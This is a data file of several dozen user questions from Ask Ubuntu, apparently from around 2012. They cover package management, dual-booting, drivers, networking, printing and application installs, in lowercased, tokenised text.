110646	delete old packages from local repository	i would like to cleanup my local repository after each upgrade . when i add newer version of packages to pool and regenerate indexes with dpkg-scanpackages , program warns about old versions of packages ( in case -m option is not passed ) : dpkg-scanpackages : warning : package php5-common ( filename pool/local/php5-common_5.3.6-13ubuntu3.3_amd64.deb ) is repeat but newer version ; dpkg-scanpackages : warning : used that one and ignored data from pool/local/php5-common_5.3.6-13ubuntu3.2_amd64.deb ! i 'm looking for an automated way to safely remove old packages from disk . i 'll call such a script safe if it do not delete an old package if a newer version is available and removing old version will cause an unmet dependency in local repository
110647	post installation /home partition	i installed ubuntu 1st with the default partitions and now i want to migrate to a swap boot home ... partition layout.is it possible to change that after the installation ? best regards , georg
110648	where should i file a jack-sense bug ?	it 's a super non-critical bug . it 's easily user bypassable . in my case with an hp laptop with intel on-board audio , if i shut down with the headphones plugged in and start with headphones unplugged the sound stays selected to headphone jack . even if i play with the volume slider . the fix for me was to plug and unplug the headphones . the question , do i report it to alsa or pulse ? i do n't know who is responsible for output selection logic . edit : after some googling involving the terms jack , jack-sense , intel , and intel-hda i found that there are several open bugs for alsa that are marked in a non-dismissive way . ex : https : //bugzilla.redhat.com/show_bug.cgi ? id=540402 ... so it appears alsa is the right place .
110649	how can i stop firefox throwing a ns_error_file_corrupted error ?	i had a powercut last night and ever since then when i try to access the ask ubuntu chat , i see the following error in firebug . component returned failure code : 0x8052000b ( ns_error_file_corrupted ) [ nsidomstorage.getitem ] i assume i 'm getting this because the storage that firefox uses for html5 local storage ( which se chat uses to cache the session ) has been corrupted by the dirty reboot . no amount of force-refreshing seems to fix this , so what do i do now ? i have already tried : nuking my `` offline storage '' from the preferences screen . rmming localstore.rdf
110650	printing in ubuntu 11.10 using samba from a windows xp as the printer server	( translation ) hello , i 'm a new ubuntu user and i need help . i ca n't print with samba . from what i know , i added the printer driver for the canon i860 . i already tried several drivers . in windows i use a more general driver for the printer which already comes in ubuntu . i do a page test which tells me it was completed successfully but it actually did not print anything . a moment ago i noticed that on windows the printer viewer mentioned that it was on low level and then disappears without doing any printing . what can i do ? ( original post ) hola soy nuevo usuario en ubuntu y necesito de su ayuda no puedo mandar a imprimir con samba , segun esto en impresoras agrego instalo los ocntroladores de la canon i860 ya intente con varios controladores pues en windows use otro driver gral para la impresora y bueno es instalada tmb en ubuntu , pasando de eso hago una prueba de impresion y manda la impresion y me dice que ha sido completada la operacion cuando no hace nada , hace poco note que en windows en el visualisador de tareas de impresion sale el documento pero dice q es uno de bajo nivel y desaparece ya no hace ningun proceso , que puedo hacer ?
110654	recommend update : unable to install , still available	since a couple of days ago the update manager shows the recommended update `` x.org x server - via dsplay driver '' . i ca n't check its checkbox to install it , but it still shows up . so how can i a ) run this update or b ) delete it from the list ? thanks !
110655	wireless slow on an intel 3945abg card	i have a toshiba satellite a105 . it worked ok with windows on it , but it works amazingly with ubuntu . i really like ubuntu so far . with one exception : the wireless is extremely slow . ridiculously so , you have to wait 10 minutes for one webpage to load . if i connect it with an ethernet cable it works just fine , or if i use a windows computer . i 've found many 'solutions ' for this problem , but none of them have worked . i 've got an intel pro/wireless 3945abg wireless card . here 's what i 've tried so far : disabling ipv6 ( like this place suggests ) . nothing changed , as far as i could tell . using wicd instead of of network manager ( as outlined here : www.dreamlogic.net/archives/fixing-slow-wifi-in-ubuntu-11-10 . it worked briefly , and then it stopped working entirely . using ndiswrapper to install a dell driver , as outlined here : www.overclock.net/t/368589/solved-slow-wireless-speeds-in-ubuntu-but-not-vista # post_4334413 . i 've tried all of this stuff . unsuccessfully . i 'm pretty new to linux , so if you could instruct my foolishness i would be much obliged . thanks a lot ! oh , and i 'm running oneiric ocelot ( 11.10 ) , by the way .
110656	ffmpeg unmet dependencies	i faced an issue recently when tried to install ffmpeg on my ubuntu computer . i am running ubuntu 11.10 64 bit , all latest updates are installed and system runs perfectly , however i feel need in recording my desktop and have read many articles that ffmpeg is one of the best recording tools for it ( besides providing packages for video ) so i tried to run sudo apt-get install ffmpeg however i was n't able to do this because packages have unmet dependencies . here is a full text i receive after trying to install package above . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ffmpeg : depends : libavcodec53 ( < 4:0.7.3-99 ) but it is not going to be installed or libavcodec-extra-53 ( < 4:0.7.3.99 ) but 4:0.8.0.1~ppa2 is to be installed depends : libavdevice53 ( > = 4:0.7.3-0ubuntu0.11.10.1 ) but it is not going to be installed or libavdevice-extra-53 ( > = 4:0.7.3 ) but it is not going to be installed depends : libavdevice53 ( < 4:0.7.3-99 ) but it is not going to be installed or libavdevice-extra-53 ( < 4:0.7.3.99 ) but it is not going to be installed depends : libavfilter2 ( > = 4:0.7.3-0ubuntu0.11.10.1 ) but it is not going to be installed or libavfilter-extra-2 ( > = 4:0.7.3 ) but it is not going to be installed depends : libavfilter2 ( < 4:0.7.3-99 ) but it is not going to be installed or libavfilter-extra-2 ( < 4:0.7.3.99 ) but it is not going to be installed depends : libavformat53 ( < 4:0.7.3-99 ) but 4:0.8-1u1~ppa2 is to be installed or libavformat-extra-53 ( < 4:0.7.3.99 ) but it is not going to be installed depends : libavutil51 ( < 4:0.7.3-99 ) but it is not going to be installed or libavutil-extra-51 ( < 4:0.7.3.99 ) but 4:0.8.0.1~ppa2 is to be installed depends : libpostproc52 ( < 4:0.7.3-99 ) but 4:0.8-1u1~ppa2 is to be installed or libpostproc-extra-52 ( < 4:0.7.3.99 ) but it is not going to be installed depends : libswscale2 ( < 4:0.7.3-99 ) but 4:0.8-1u1~ppa2 is to be installed or libswscale-extra-2 ( < 4:0.7.3.99 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . this problem has n't existed on my previous laptop which runs the same ubuntu 11.10 64 bit as my new one . can anyone please help me find a solution without `` messing and braking '' the whole system ? thank you for helping in advance .
110659	roll back of ubuntu installation possible to get a win7 partition back ?	after testing ubuntu 11.10 ( 64 bit ) by booting it from the cd , i unfortunately decided to install it on my pc . on my pc i had kept on each hd and the ssd as well space enough for other partitions . i used the offered option to install ubuntu alongside with win7 and ... ended up in a half destroyed system . everything seemed to work well during the installation , but after reboot i got the mess . during boot it does not ask me which os i would like to choose , as it was said in the installation routine . it always boots windows , but the windows partition on drive d : ( 30 % of the disk ) is gone and win7 ( 64 ) instead reports a raw partition with the the entire capacity of around 500gb . my drive c : ( ssd ) and drive e : ( hd ) seem to be ok though . but d : was my win program drive and so my win7 installation is nearly unusable . is there a way to revert the installation and get my partition on drive d. back ?
110668	network administrating software ( similar to clearos )	i am looking for a network administrating software that is similar to the clearos in this link : http : //www.clearfoundation.com/software/screenshots.html of course the software should be for ubuntu or work in ubuntu but offer similar features as the administrative panels in clearos . is there a network administrative software similar to this in ubuntu .
110669	what do i need to put in jetty.xml to make the admin console work ?	i got an ubuntu-server for dev purposes running activemq . i installed them from the package repository and did minor configurations to the activemq . i want to use the admin console but in order to do so i need the webapps folder which seems to be missing from the package . i searched around in the package and i did n't find any . i suppose that the webapps should be in the { activemq.home } folder which is defined from the package on /usr/share/activemq . also i know that it requires jetty configuration as in xml . the jetty config can be found in the example docs : /usr/share/doc/activemq/examples/conf/jetty.xml.gz my question is what should i put into the jetty.xml to make the admin console work ? should i copy the webapps folder from the tar.gz downloaded package from apache site to the home folder ? posting my current activemq.xml if it 's helpful : < beans xmlns= '' http : //www.springframework.org/schema/beans '' xmlns : amq= '' http : //activemq.apache.org/schema/core '' xmlns : xsi= '' http : //www.w3.org/2001/xmlschema-instance '' xsi : schemalocation= '' http : //www.springframework.org/schema/beans http : //www.springframework.org/schema/beans/spring-beans-2.0.xsd http : //activemq.apache.org/schema/core http : //activemq.apache.org/schema/core/activemq-core.xsd '' > < bean class= '' org.springframework.beans.factory.config.propertyplaceholderconfigurer '' / > < broker xmlns= '' http : //activemq.apache.org/schema/core '' brokername= '' localhost '' datadirectory= '' $ { activemq.base } /data '' destroyapplicationcontextonstop= '' true '' > < destinationpolicy > < policymap > < policyentries > < policyentry topic= '' > '' producerflowcontrol= '' true '' memorylimit= '' 1mb '' > < pendingsubscriberpolicy > < vmcursor / > < /pendingsubscriberpolicy > < /policyentry > < policyentry queue= '' > '' producerflowcontrol= '' true '' memorylimit= '' 1mb '' > < /policyentry > < /policyentries > < /policymap > < /destinationpolicy > < destinations > < queue physicalname= '' cmagentstatus '' / > < queue physicalname= '' cmupdaterequest '' / > < queue physicalname= '' cmsnapshotevent '' / > < /destinations > < managementcontext > < managementcontext createconnector= '' true '' / > < /managementcontext > < persistenceadapter > < kahadb directory= '' $ { activemq.base } /data/kahadb '' / > < /persistenceadapter > < transportconnectors > < transportconnector name= '' openwire '' uri= '' tcp : //0.0.0.0:61616 '' / > < /transportconnectors > < /broker > < ! -- < import resource= '' jetty.xml '' / > -- > < /beans >
110672	add-apt-repository returns unexpected length error	ubuntu 11.10 ( oneiric ocelot ) : when i try to add a new ppa through add-apt-repository , it returns with : rene @ rene-ms-n104 : ~ $ sudo add-apt-repository ppa : tualatrix/ppa traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 88 , in < module > ppa info = get_ppa_info_from_lp ( usr , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error ( 35 , 'gnutls_handshake ( ) failed : a tls packet with unexpected length was recieved . ' ) i 'm fairly new to ubuntu and am not sure how to proceed .
110674	trouble connecting to wifi from eee pc and kindle fire	i just installed ubuntu on a seashell eee pc . as of now , it `` sees '' wifi networks , but has continuously tries to connect ( with the correct password ) , to no avail . also , an amazon kindle fire has a similar issue , though it may be entirely unrelated . the netbook connected to wifi fine in windows 7 . i 'd be happy to provide as much information as i can to help ! thanks for any and all help !
110677	root files system not defined	i am new to ubuntu , and was installing ubuntu 11.04 from a cd . i booted up the cd and went to the installation process . i got to the step where it asked me to allocate my drive space . the window above with the columns titled mount , drive , etc. , was completely empty . i did n't know what to do , so i pressed continue anyway . another window appeared saying that the root file system was not defined , and that i needed to define it from the partitioning menu , which was blank ! i have looked everywhere for the solution , and there is a lot of talk about setting the mount point to `` / '' . i understand that that , but where do i set it ! i also have not gone through the same installation windows as everyone else . ( my installation process seems to skip the window where you decide to install ubuntu or try it from the cd . ) please help !
110693	what resources should i use to learn to develop apps for ubuntu ?	i just made up my mind that i want to learn how to develop apps for ubuntu linux , using quickly , and its tools ( pygtk+ , glade , etc . ) is there any tutorials or resources that you can recommend to me , aside from the ones at developer.ubuntu.com , that will help me learn to use these applications ? i 've looked all over the place , but there just does n't seem to be a lot of resources online . i really appreciate the help . thanks !
110694	remove google chrome icon from dash search	i just installed chromium today and removed google chrome via `` sudo apt-get purge google-chrome-stable '' the application is gone , but the shortcut in my menu is still there . does anyone have any ideas on how to remove it ? here 's a screenshot of what i see when i type in `` chr ( om ) '' , which is how i typically search for chromium .
110697	no sound with speaker on an imac	i have an imac with snow leopard and ubuntu 11.10 installed . the sound with snow leopard works fine and before it worked equally well with ubuntu but suddenly no longer works with the speaker but when i put the headphones i have the sounds . perhaps because of updating ubuntu ? can you tell me how i can solve this problem ?
110698	add windows to my boot menu	i have windows installed on /dev/sda3 and running ubuntu 11.10 on /dev/sda5 . the boot loader points to /dev/sda1 and /dev/sda2 . both are parts of the recovery system for my laptop . how do i edit the boot menu so that it points to /dev/sda3 . i 've tried following the directions , but i 'm confused by them and many are outdated as things changed , apparently with 11.04 . can someone help me , please ? i just need to add the one entry . thanks ! it turns out that /dev/sda2 was my windows loader , but it was failing to boot . after a helpful content , i re-installed windows and it fixed the issue . thanks for the help .
110719	change the monitor that awn shows up on	i 'm using avant windows manager and xubuntu with pure xfce4 . i 'm trying to change the monitor that awn shows up on . i tried changing the primary monitor with xrandr , but it does n't seem to want to change the primary monitor with xubuntu . does anyone know how i can do this ? if not , does anyone have suggestion on a dock to use that allows for me to change the monitor it shows up on ? any help would be greatly appreciated .
110721	can not login dashboard / unable to find the server at mykeystoneurl	i installed dashboard following this guide : http : //wiki.openstack.org/openstackdashboard everything fine , but when i run the server , i can not login with the username and password in database config in local_settings.py . here 's my config : databases = { 'default ' : { 'engine ' : 'django.db.backends.mysql ' , 'name ' : 'dashboarddb ' , 'user ' : 'nova ' , 'password ' : 'nova ' , 'host ' : 'localhost ' , 'default-character-set ' : 'utf8' } , } when i run the dashboard server and enter username + password . it returned this error on browser : unable to find the server at mykeystoneurl ( http 400 ) and in the command line : debug : openstack_dashboard.settings : running in debug mode without debug_toolbar . debug : openstack_dashboard.settings : running in debug mode without debug_toolbar . validating models ... 0 errors found django version 1.3.1 , using settings 'openstack_dashboard.settings' development server is running at http : //0.0.0.0:8888/ quit the server with control-c. request returned failure status . traceback ( most recent call last ) : file `` /home/us/horizon/.venv/src/python-keystoneclient/keystoneclient/client.py '' , line 121 , in request body = json.loads ( body ) file `` /usr/lib/python2.7/json/__init__.py '' , line 326 , in loads return _default_decoder.decode ( s ) file `` /usr/lib/python2.7/json/decoder.py '' , line 366 , in decode obj , end = self.raw_decode ( s , idx=_w ( s , 0 ) .end ( ) ) file `` /usr/lib/python2.7/json/decoder.py '' , line 384 , in raw_decode raise valueerror ( `` no json object could be decoded '' ) valueerror : no json object could be decoded [ 06/mar/2012 15:20:03 ] `` post /auth/login/ http/1.1 '' 200 3735 i also tried login as `` admin '' with password is `` password '' or `` secrete '' but i did n't work . what 's wrong ? thank you !
110722	windows xp no longer boots	after installing ubuntu 11.10 i found that windows xp will no longer boot . when the system goes to the boot menu , i can see an option for windows xp , but when i select it the screen goes black for a few seconds and then returns to the boot screen instead of booting windows xp . i have two hard drives , windows is on one and ubuntu is on a partition on the other ( i think ) .
110725	why can i not start cheese	i have install many applications and cheese was one of those but i can not open i have tried cheese on debian 6.04 and cheese works fine but not on ubuntu . maybe , i do not any drivers installed on the system ? because they are available . do i have to install them ? if this is the cause of that , what can i do , or when a driver it will be available ? ( i send a report 2 launchpad of the system ) and because of that i can not use neither ubuntu 3d or gnome shell or play 3d games . my hardware display on terminal using command lspci was : 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) ( ..just about every hardware is from silicon integrated systems [ sis ] on my laptop ) using cheese on terminal give me this error : xlib : extension `` glx '' missing on display `` :0.0 '' . ( cheese:4163 ) : clutter-critical ** : unable to initialize clutter : the opengl version could not be determined but after a new installation of ubuntu and update ( did here a reboot ) and new instalations of applications give me a different error before reboot on terminal that was : ( cheese:506 ) : clutter-critical ** : unable to initialize clutter : unable to find suitable fbconfig for the glx context : unable to find fbconfig with rgba visual but them after rebooting after installing aplication give the same error xlib : extension `` glx '' missing on display `` :0.0 '' . ( cheese:4163 ) : clutter-critical ** : unable to initialize clutter : the opengl version could not be determined i have also installed ubuntu 12.04 and cheese works fine like for example stellarium even without a driver installed so should i try to upgrade ubuntu 11.04 to ubuntu 12.04 beta ? or wait for ubuntu 12.04 ? i have upgrade ubuntu from 11.10 2 ubuntu 12.04 beta but still did n't work.. so i try to install ubuntu 12.04 beta from the start make a update and them install cheese it works like it did but them i also use synaptic and install all packages or applications from the markings on my ubuntu 11.10 .. and it seen all is working on the graphics better not fast but working like for exemple supertuxkart or stellarium
110727	windows computers can only print test pages to shared ubuntu printer	i have an hp printer connected to my ubuntu 11.10 machine . i have 2 other windows computers ( win7/vista ) . both of these windows computers can view , install , and print a test page to the shared ubuntu printer . the windows computers can not print anything to the ubuntu printer except the test page under properties or during install . i have tried word and pdf files .
110732	why does the decoration of windows eliminate in ubuntu 11.10 ?	i am using my computer , do some work , use the chat , game , which any person does , but , of nothing i realize that the decoration of windows disappears , which leaves me without being able to conceal , maximize , minimize and close the windows . i use ubuntu 11.10 of 64 bits , and have installed compiz config . i use unity .
110735	how do i set a static ip address ?	my eth0 is using dhcp to get ip address for internet . however i still need to set some static ip for my lan . the following is my setting in /etc/network/interface . any problem on the script ? i always failed when i try to start network . i checked the ip via ifconfig . and found eth0:3 is set but others . may i know what 's the problem ? 1 auto lo 2 iface lo inet loopback 3 4 # auto eth0 5 # iface eth0 inet dhcp 6 7 auto eth0:1 8 iface eth0:1 inet static 9 address 192.168.20.222 10 netmask 255.255.255.0 11 gateway 192.168.20.1 12 13 auto eth0:2 14 iface eth0:2 inet static 15 address 192.168.30.222 16 netmask 255.255.255.0 17 gateway 192.168.30.1 18 19 auto eth0:3 20 iface eth0:3 inet static 21 address 192.168.211.222 22 netmask 255.255.255.0 23 gateway 192.168.221.1
110741	remove the ubuntu-desktop package	how does one go about removing the packages installed by ubuntu-desktop . i could n't imagine going back to that after using lxde .
110743	how would i dual boot ubuntu as primary and mac os x as secondary on a 32bit pc ?	i 'm wanting to install mac os-x on my 32bit pc as a secondary boot - is this possible to do on a 32bit pc system ? would i need to repair grub as well so i can use ubuntu again as my primary ? i 'm trying to install snow leopard as my secondary boot and yes im on a pc .
110744	how do i measure performance of a virtual server ?	i 've got a vps running ubuntu . being a virtual server , i understand that it shares resources with unknown number of other servers , and i 'm noticing that it 's considerably slower than my desktop machine . is there some tool to measure the performance of the virtual machine ? i 'd be curious to see some approximate measure similar to bogomips , possibly for cpu ( operations/sec ) , memory and disk read/write speed . i 'd like to be able to compare those numbers to my desktop machine . i 'm not interested in the specs of the actual physical machine my vps is running on - by doing cat /proc/cpuinfo i can see that it 's a nice quad-core xeon machine , but it does n't matter to me . i 'm basically interested in how fast a program would run in my vps - how many cpu operations it can make in a second , how many bytes to write to ram or to disk . i only have ssh access to the machine so the tool need to be command-line . i could write a script which , say , does some calculations in a loop for a second and counts how many loops it was able to do , or something similar to measure disk and ram performance . but i 'm sure something like this already exists .
110747	server 11.10 to be used as a dhcp server	i am trying out an ubuntu server in my home network and i am planning to use it as a dhcp server . since ubuntu is installed in a desktop with just 1 ethernet port my question : is it possible to configure both static public ip on the ethernet port at the same time that it is being used as a listening port for dhcp to distribute ip addresses on my network ? if it is , will it have any negative effect on the connection speed ?
110754	ubuntu one cloud folder stats	as a loyal ubuntu user i 'm going to keep using the ubuntu one service , even though i 'm experiencing significant problems ( i 've posted about those separately ) . it would be really helpful , especially for diagnosing problems , if i could get some stats on cloud folders : how many files are in a particular folder ? how much storage does a particular folder use ? when i have a folder like `` pictures '' or `` music '' that has hundreds to thousands of files in it , i ca n't just do a file by file visual inspection to make sure all my files are there . getting some by-folder stats would be a huge help .
110758	how to find what packages do not come from a repository ?	i have problem with one deb repository ( specifically medibuntu.org ) today - synaptic is not able to find repository indexes ( and they are really not there - maybe due to yesterday 's changes ) . so i have the errors flying all over the place . i could just remove that repository - but i simply do not remember which packages came from it , so just removing it could screw my updates on some crucial package . so , my question is - how do i find , which installed packages can not be found in any repository ?
110759	am trying to get rid of extra entries on boot menu	trying to purge the entry below but response is ca n't find . then i do grub update and it sees the entries . help luisc @ luisc-optiplex-gx280 : ~ $ sudo apt-get purge linux-image-2.6.38-13 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-image-2.6.38-13 e : could n't find any package by regex 'linux-image-2.6.38-13' luisc @ luisc-optiplex-gx280 : ~ $ sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.0.0-16-generic found initrd image : /boot/initrd.img-3.0.0-16-generic found linux image : /boot/vmlinuz-2.6.38-13-generic found initrd image : /boot/initrd.img-2.6.38-13-generic found linux image : /boot/vmlinuz-2.6.35-31-generic found initrd image : /boot/initrd.img-2.6.35-31-generic found memtest86+ image : /boot/memtest86+.bin found windows vista ( loader ) on /dev/sda1 found ubuntu 10.10 ( 10.10 ) on /dev/sda11 found ubuntu 11.10 ( 11.10 ) on /dev/sda9 done tried the suggested command and this is what i get . luisc @ luisc-optiplex-gx280 : ~ $ sudo apt-get purge linux-image-2.6.38-13-generic [ sudo ] password for luisc : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-image-2.6.38-13-generic e : could n't find any package by regex 'linux-image-2.6.38-13-generic' luisc @ luisc-optiplex-gx280 : ~ $
110765	can i trust all packages in the ubuntu official repository ?	can i trust all packages in the ubuntu official repository ? what security verifications are done for these packages ?
110769	turn off sound on login page in 12.04	how do i turn off the startup sound on the login page in precise ? it used to work with sudo -u gdm gconftool-2 -- set /desktop/gnome/sound/event_sounds -- type bool false thanks
110774	wiping my hard disks , how do i pull out and sort all the music/videos/pictures ?	looking to raid my hard disks but need all the important stuff out first , have not been very tidy with my file management , is there a program that will scan my computer and pull out all the video , music and pictures ? also placing it into some sort of file structure ? i do n't mind using multiple programs . sam
110778	where is wireless driver on cd ?	i made an installation cd ( 10.04 ) , the cd has a driver for my wireless network card ( in the trial version ) , how do i find the driver so i can use it with my new installation ? i tried whereis broadcom but it found nothing . edit : yes , using the live cd , an icon came up to install non-proprietary drivers , when i click install ... it say 's ... downloading , the disk spins a bit ... and it installs . from my installation there does n't seem to be anything available ... thanks . edit : yes grahammechanical , that fixed it thanks .
110782	when both wired and wireless network connections are active , which one is used ?	i imagine that most applications do n't even notice that i have two network cards . they ask the kernel to open a socket and they 're happy like that . transparency is great . i 'm left wondering : when i am connected to both a wired and wireless network , which one is used by the system ? the first one that was created ? the last ? both equally ? both randomly ? both , with some intelligence to balance the load and find the open ports ? related : what does the network history part of the system monitor actually displays ? the sum of the debit of the two network cards ?
110783	pain in the neck : is there a way to reverse the vertical direction of gnome-terminal ?	by reversing vertically , i mean that the prompt line is always on the first line in the terminal window , and the command output is printed below the current prompt . something like this : original name @ host $ ls desktop documents downloads examples.desktop music pictures public templates name @ host $ ( waiting for next command ) reversed name @ host $ ( waiting for next command ) desktop documents downloads examples.desktop music pictures public templates name @ host $ ls i 'm looking for this because looking at the bottom of the screen for a long time makes my neck hurt . thanks
110784	can i safely remove banshee ?	i prefer clementine as my music player . i 'd like to completely remove the default player ( currently banshee ) and replace it with clementine . can i do this , without breaking ubuntu ?
110792	gnome 3 change system notification to be as unity ?	the notification area in the bottom of screen is annoying , can i change the place and look of it to be as in unity ? `` at the right top and disappears when hover over it '' ? and also is there an extension to change the icons of some programs from system tray to the upper panel ?
110796	after restoring cz image grub is damaged	after i restore disk/partition ( same result ) backup image of my ubuntu server using clonezilla live , i get no arguments specified error on bootup , then the system is trying to boot but failing . i know the problem is related to video modes , but it does n't matter and what i need to know is how exactly to backup or restore ( which options perhaps to use in clonezilla advanved mode ) in order to restore image to the state that my system was before backup . i was able to recover only after reinstalling grub-pc . so it seems grub was demaged not sure in which stage .
110800	invalid command 'perlloadmodule ' in apache2	i installed a redmine of alminium . git clone https : //github.com/alminium/alminium.git cd alminium sudo bash ./smelt and the alminium was successfully installed . but while apache2 is being started , the error message below appears and apache2 fails to start . syntax error on line 2 of /etc/apache2/sites-enabled/vcs : invalid command 'perlloadmodule ' , perhaps misspelled or defined by a module not included in the server configuration action 'start ' failed . in the 'vcs ' , the line below is defined . perlloadmodule apache : :authn : :redmine to workaround this issue , what should i do ?
110801	how can i dual-boot a truecrypt-encrypted windows 7 and ubuntu 11.10 when both are installed separately on different physical drives ?	how can i dual-boot a truecrypt-encrypted windows 7 and ubuntu 11.10 when both are installed separately on different physical drives ? i have two hard drives . hd0 has a truecrypt-encrypted windows 7 installation with the truecrypt bootloader . hd1 has an ubuntu 11.10 installation with the grub2 bootloader . the output of fdisk -l is as follows : device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 976771071 488282112 7 hpfs/ntfs/exfat device boot start end blocks id system /dev/sdb1 * 2048 968517631 484257792 83 linux /dev/sdb2 968519678 976771071 4125697 5 extended /dev/sdb5 968519680 976771071 4125696 82 linux swap / solaris i can successfully boot into either os by changing the boot order in the bios but do not want to have to repeatedly do this . my options are either : add the truecrypt bootloader to the grub2 config and chainload this with grub2 . boot into the truecrypt bootloader and , when hitting escape to exit password entry , boot into grub2 . i have had difficulty with option 1 , as when hitting escape truecrypt finds no other bootable partition . as i understand , it should search for other bootable disks . i also have had difficulty with option 2 , and with the following inside /etc/grub.d/40_custom ( and then running update-grub2 ) ... menuentry `` windows 7 '' { set root= ( hd0,1 ) chainloader +1 } ( i also tried root= ( hd0,0 ) and root= ( hd0,2 ) ) ... i get errors with no such partition . i have also read various sources that suggest it is n't possible to do this with grub2 without mounting and booting into the truecrypt rescue disk iso prior to booting windows . is this necessary ? what am i doing wrong ?
110802	kde 4 opens up the items that were not closed at shutdown again	let 's say i have chromium and dolphin open up when i shut down , then both are reopen upon reboot.how do i prevent this ? dwm : kde 4 linux flavour : ubuntu
110803	my program can not run with `` command not found '' error	i just switched from windows to ubuntu 11.10 . i wrote the following code in c with the text editor and saved it as helloworld.c in documents . # include < stdio.h > int main ( ) { printf ( `` hello world ! \n '' ) ; return 0 ; } and i started the terminal and enter the following commands : cd documents gcc helloworld.c a file called a.out , which , after some search on google , is the executable . i entered this command : a.out but i get a.out : command not found which step did i do wrongly ?
110804	recommended wireless hardware	i would like to buy a wireless card or usb adapter in order to be able to connect to my home wireless network from my desktop computer . i heard that some cards are pain in ubuntu , because of drivers . can you recommend some usb wireless adapters that can work in ubuntu ? thanks in advance .
110806	how to set up orca screen reader ?	i 'm helping a friend of mine set up an ubuntu environment for school , but he requires special software that reads things out loud because of his dyslexia . now , i immediately knew that orca should do just the job for this , but i 'm particularly clueless about how to set it up . right now , it just screams random things at me when opening windows , closing them , etc. , when i just require it to speak ( selected ) text out loud . preferably text from text editors and pdf files . is there any easy way to set it up accordingly ? because i 've toyed around a lot , but have n't been able to get it to work just like i want it to . help would be magnificent .
110809	unable to boot from live usb on dell inspiron n7110	i bought a dell inspiron n7110 and wanted to try ubuntu 11.10 64-bit liveusb on it . i managed to boot from the usb , for a while ( i saw the ubuntu circle at the bottom of the screen ) , but then i only saw a blinking cursor on the black screen , that eventually froze completely . then the laptop fan started to sound more and more and i was forced to shutdown . i tried burning the same image of ubuntu 11.10 64-bit to a cd and to boot from it . this worked as it should , with no problems , and i was able to explore the live session . does anyone knows what might be the cause of the problem that is preventing me from booting a live usb from this laptop ? i have tried to boot from the same usb on my hp desktop computer and it worked perfectly .
110811	where can i find warblender	warblender is a blender plug-in which allows you to save project to .mdx i tried to download via http : //projects.blender.org/frs/ ? group_id=67 but all the download links are 0 bytes sudo bzr branch lp : warblender svn checkout https : //svn.blender.org/svnroot/warblender/trunk git clone git : //github.com/tekahera/warblender all of these did n't download anything for me with the exception of the svn checkout https : //svn.blender.org/svnroot/warblender/trunk command and this is what it downloaded trunk/cvsroot trunk/cvsroot/cvswrappers trunk/cvsroot/checkoutlist trunk/cvsroot/editinfo trunk/cvsroot/rcsinfo trunk/cvsroot/commitinfo trunk/cvsroot/config trunk/cvsroot/taginfo trunk/cvsroot/modules trunk/cvsroot/notify trunk/cvsroot/verifymsg trunk/cvsroot/loginfo but i have no idea what to do with it . i ca n't seem to find a deb file . how can i download warblender , and how to install if it is not a deb file thanks in advanced .
110812	keep setting the external monitor	every time i turn on my notebook i have to configure the resolution of external monitor with the `` grandr . '' always turn off the notebook display and change the resolution of external monitor . i wonder if i have some way to configure this setting remain as default every time i turn off the notebook . does anyone know how ? i used ubuntu 11.10 . thanks
110813	rubygem version downgrade	when the command of sudo rake db : migrate was executed the error message below appeared . rake aborted ! rubygem version error : rack ( 1.4.1 not ~ > 1.1.0 ) i guess the rubygem version is later than the expected one . how can i downgrade the version of rubygem ?
110814	server keeps asking for password after i 've copied my ssh public key to authorized_keys	i have an ubuntu server , running in a cloud . i created a user ( git ) . in the folder /home/git , i have created the .ssh/ dir , and the authorized_keys file . but , when i put my ssh public key in the authorized_keys file , the server continues to ask me the password . what i did wrong ?
110818	ca n't install ubuntu , black screen after install	i tried several times , but was n't able to make it work . i tried all recent types of ubuntu but it did n't work . then i tried acpi=off at the beginning of the installation . in this way i could finish the installation . but after the restart ubuntu did n't work . only a black screen appeared . before that i tried it on the virtualbox and it work . by the way my system is the following : ( i use windows 7 currently ) processor amd athlon ii p320 ( 2,1 ghz , second-level cache 2 ? 512 kb , ht 1600 mhz bus ) chipset amd m880g + sb850 memory dual channel , 3 gb ddr3-1066 wide screen 15.6 “high-definition ( 1366 ? 768 ) c led-backlit , au optronics b156xw02 video card amd radeon hd 4250 , from 336 mb video buffer in memory , support for directx 10.1 and uvd sound system : hda-codec idt 92hd81b1x amd hdmi audio hard drive wdc wd3200bevt-75a23t0 ( 298 gb , 5400 rpm , sata 2.0 ) optical drive : dvd ± rw optiarc ad-7585h communication tools fast ethernet ( 10/100 mbit / c ) realtek rtl8102e/rtl8103e wifi 802.11a/b/g broadcom bcm4310 bluetooth 2.1 + edr card reader memory card reader 7-in-1 with support for sd / sdhc / mmc / ms / xd , and derivatives interfaces / ports 3 usb 2.0 1 esata + usb 2.0 15-pin video connector vga hdmi rj-45 ethernet 10/100 mbit / c 2 analog mini-jack : a microphone / headphone jack for a kensington lock slot ac adapter battery li-ion 6-cell capacity of 4400 ma ? h ( 10,8 , 48 w ? hr ) ac power adapter 65 watt additional equipment integrated web-camera ( 1.3 mega pixels )
110819	rubygem mysql binding fails	when i executed 'gem install mysql ' , the error message below appeared . error : error installing mysql : error : failed to build gem native extension . /usr/bin/ruby1.8 extconf.rb extconf.rb:10 : in `require ' : no such file to load -- mkmf ( loaderror ) from extconf.rb:10 to workaround this , what should i do ?
110821	how to install blender from the official website	i installed blender from official repository but its version is 2.59 so i downloaded version 2.61 from their web site . it works without any installation , but i want to replace blender 2.59 with blender 2.61 how to do it ? it must be present in the unity launcher i 'm aware of this question : is there a ppa for the latest blender version ? however , i dont want to use a ppa - i just want to install blender downloaded from blender.org thanks in advance
